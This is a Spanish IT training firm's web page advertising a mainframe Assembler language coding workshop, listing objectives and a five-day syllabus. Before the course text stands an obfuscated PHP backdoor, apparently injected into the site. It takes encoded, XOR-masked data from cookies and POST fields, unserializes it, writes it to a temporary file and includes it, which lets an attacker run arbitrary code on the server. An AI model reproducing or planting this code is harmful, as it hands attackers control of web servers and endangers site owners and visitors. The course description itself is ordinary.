$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Assembler Language Coding Workshop|Grupo Loyal

Assembler Language Coding Workshop

Assembler Language Coding Workshop

This classroom hands-on lab course provides an introduction to the mainframe Assembler language. The course is designed to develop the skills appropriate to write and/or maintain programs and routines written in S/370 or S/390 Assembler Language. Emphasis is placed on enhancing skills in problem resolution through program check interruption analysis and dump reading.

Objetivos

Recognize architectural features, such as instruction formats, data representation, storage addressing, and so on, which are significant to program analysis
Identify point of program interruption, using the formatted system dump and elements of information such as the Program Status Word (PSW), the Instruction Length Code (ILC), the program's base register(s), and so on
Identify appropriate standards for assembler programs in terms of program organization, register conventions, coding practices, documentation, and so on
Code and debug assembler language programs which:
Conform to standard linkage conventions using save area chaining
Define and use various types of data definitions, including fixed point binary, character, hexadecimal, and packed decimal
Employ standard macros such as CALL, SAVE, RETURN
Use various Assembler Language statements such as CSECT, EQU, COPY, END
Use both symbolic and explicit notational forms for instructions
Use data literals appropriately, and explain the use of LTORG to direct positioning of the literal pool
Create and use appropriate patterns for EDIT instructions

so

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Acceso al campus

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
25 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

Conocimientos requeridos

Temario

Day 1

Welcome
Unit 1 - Numbering systems
Unit 2 - Mainframe architecture
Unit 3 - Assembler syntax
Overview of instructions: LA, LR, LTR, MVC, DS, DC
Exercise 1 - 80/80 listing
Exercise 1A - 80/80 listing
Day 2

Exercise 1 review
Unit 4 - Data definition statements
Unit 5 - Fixed-point binary instructions
Exercise 2 - Binary data
Day 3

Exercise 2 review
Unit 6 - Addressing, comparing, and branching
Unit 7 - Data movement instructions
Exercise 3 - Text handling
Day 4

Exercise 3 review
Unit 8 - Assembler pseudo instructions
Unit 9 - Reading dumps
Unit 10 - Packed decimal processing
Exercise 4 - Packed data/editing
Day 5

Exercise 4 review
Unit 11 - Miscellaneous instructions
Course wrap-up

Solicita información del curso

It Formacion

It Formacion